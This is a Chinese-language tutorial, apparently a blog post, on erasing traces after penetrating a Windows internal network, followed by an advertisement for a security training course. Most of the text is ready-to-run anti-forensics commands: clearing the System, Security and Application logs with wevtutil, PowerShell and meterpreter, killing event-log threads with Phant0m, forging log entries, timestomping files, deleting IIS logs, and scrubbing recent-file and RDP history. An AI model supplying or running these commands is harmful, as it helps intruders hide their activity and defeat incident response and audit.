内网渗透之Windows痕迹清理(内网渗透_内网渗透实战攻略pdf_内网渗透测试七个步骤_内网渗透是什么意思_内网渗透流程_内网渗透工具_内网渗透和外网渗透哪个难_内网渗透思路_内网渗透和外网渗透的)
日志机制
Windows操作系统在运行的生命周期内,会以特定的数据结构方式来存储和记录系统运行的大量日志。主要包括Windows事件日志、Windows Web日志、Windows FTP服务日志、Exchange server邮件服务日志、数据库日志等。
Windows日志包含九个元素,分别是事件/时间、事件类型、用户、计算机、事件ID、来源、类别、描述、数据。
系统内置三个核心的日志文件,分别是System系统日志、Security安全日志、Application应用日志,默认大小20兆。如果数据超过20兆,默认情况下,系统会优先覆盖过期的日志记录。应用程序服务日志的默认大小事1024KB。
Windows日志的记录流程:
1.svhost.exe中某些专门用于记录日志的线程启动日志记录功能;
2.记录的操作会先缓存为一段内存内容;
3.将内存内容通过wevtutil.exe解析为xml文件格式的文档;
4.将xml文件转换为可读的日志。
几种Windows日志类型:
1、系统日志:
2、security安全日志:
3、Application应用日志:
4、应用程序服务日志:
日志在注册表的键’HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog’,通过修改注册表中不同程序调用的日志记录程序或者链接库的路径,可以确保使用该程序时不会生成相关日志。
日志清理
清除日志
通过面板清除
进入Windows事件查看器
找到Windows日志
清除日志
留下日志清除事件
通过命令行清除
以管理员权限打开cmd
清除system系统日志命令
wevtutil cl system
清除application服务日志命令
wevtutil cl application
清除Security安全日志命令
wevtutil cl security
列出系统中所有日志名称
wevtutil el
查看系统创建访问时间等日志信息
wevtutil gli system
查看指定类别的日志内容
wevtutil qe /f:text system
管理员权限运行powershell
清理日志命令
PowerShell -Command “& {Clear-Eventlog -Log Application,System,Security}”
meterpreter清理日志命令
run event_manager -i 查看时间日志
run event_manager -c 清除日志
clearev 可以清除系统、应用、安全日志,不会清除安装和powershell日志
停止日志记录线程
打开任务管理器-详细信息-svchost.exe
Phant0m下载(https://github.com/hlldz/Phant0m.git)
1、打开事件管理器-安全日志
管理员权限打开cmd,运行与安全有关日志,例如创建和删除用户(net user 用户名 密码 /add、 net user 用户名 /del)
刷新安全日志
2、管理员权限打开powershell,结束日志记录功能
通过powershell将执行命令从严格调整为不严格,查看执行策略(Get-ExecutionPolicy),修改策略(Set-ExecutionPolicy Unrestricted)
powershell中切换到脚本所在位置
使用脚本
查看Eventlog是否运行
创建和删除用户,查看是否有日志记录
恢复记录
打开任务管理器
打开服务
右键详细信息
结束
重新打开日志服务
痕迹伪造
伪造日志
以管理员身份运行powershell
eventcreate -I system(日志类型) -so administrator(谁生成的) -t warning(事件等级) -d “this is test”(日志内容) -id 500(事件id)
打开事件查看器-系统日志
伪造文件修改时间
powershell修改文件创建时间
查看文件创建时间 (ls ‘test.txt’).CreationTime=“01/11/2001 01:00:00”
修改文件最后修改时间 (ls ‘test.txt’).LastWriteTime=“01/11/2001 01:00:00”
修改文件最后访问时间 (ls ‘test.txt’).LastAccessTime=“01/11/2001 01:00:00”
iis日志清理
IIS默认日志路径’%SystemDrive%\inetpub\logs\LogFiles\W3SVC1\’
打开cmd,停止服务 net stop w3svc
删除日志下所有文件 del *.*
启用服务 net start w3svc
最近使用的文件清理
打开文件管理器
点击查看,选项-常规-隐私-清除文件资源管理器历史记录
命令手工删除
文件路径C:\Users\%USERNAME%\Recent
del /f /s /q “%userprofile%\Recent*.*”
远程桌面连接记录清理
日志记录路径%userprofile%\document\
日志记录文件名default.rdp
注册表记录
删除记录
创建bat脚本
@echo off
reg delete “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default” /va /f
reg delete “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers” /f
reg add “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Server”
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
安全擦除数据
shift+del 快捷键永久删除
Cipher 命令多次覆写
Format 命令覆盖格式化
学习资源
如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你
知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。
1、知识库价值
深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。
广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。
实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
2、 部分核心内容展示
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。
内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。
1、网络安全意识
2、Linux操作系统
3、WEB架构基础与HTTP协议
4、Web渗透测试
5、渗透测试案例分享
6、渗透测试实战技巧
7、攻防对战实战
8、CTF之MISC实战讲解
3、适合学习的人群
一、基础适配人群
- 零基础转型者:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链;
- 开发/运维人员:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展或者转行就业;
- 应届毕业生:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期;
二、能力提升适配
1、技术爱好者:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者;
2、安全从业者:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力;
3、合规需求者:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员;
因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传,戳下面拿:
🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源